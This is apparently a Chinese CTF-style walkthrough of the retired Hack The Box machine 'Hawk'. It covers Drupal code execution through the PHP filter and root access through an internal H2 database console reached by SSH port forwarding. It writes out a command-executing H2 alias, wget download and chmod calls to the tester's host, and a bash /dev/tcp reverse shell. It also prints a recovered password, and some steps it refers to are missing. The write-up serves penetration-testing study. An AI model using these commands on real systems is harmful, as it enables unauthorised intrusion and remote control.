本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.102
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.102 -o ./Hawk-autorecon
根据扫描结果,首先匿名登录ftp服务器
将下载好的文件改名并使用base64解码得到如下文件
上面的命令通过apt-get安装下即可
上述解密出来了一个密码,跟web应用有关,访问web应用是个登录界面
这里经过尝试确认了账户和密码直接登录进去,在模块里面启用php filter功能,然后添加文本内容,基础页面进入之后写入名称和反弹shell代码,这里使用php-reverse-shell.php 通过命令 cat php-reverse-shell.php | xclip -selection clipboard复制到粘贴板上
预览即可触发反弹shell代码,触发之前本地监听端口即可
通过本地在网站根目录下遍历搜索发现如下信息:
得到密码drupal4hawk 查看本地网络连接和刚开始扫描的端口开放情况得知开放了8082端口的web应用页面,直接访问发现被限制了
通过ssh进行端口转发
ssh -L 8099:127.0.0.1:8082 daniel@10.10.10.102
本地kali执行
然后本地访问8099端口即可,这里登录的时候记得调整为root,密码就上面获取到的,进入之后先创建一个可执行命令的函数,然后写个反弹shell代码本地搭建简易web应用下载到目标靶机然后执行反弹代码进行反弹shell,具体操作如下:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A"); return s.hasNext() ? s.next() : ""; }$$;
call SHELLEXEC('wget http://10.10.14.6:8000/bmfxshell') call SHELLEXEC('chmod +x bmfxshell')
反弹代码:bash -i >& /dev/tcp/10.10.14.6/8844 0>&1 然后开始执行
本地监听端口并获取反弹shell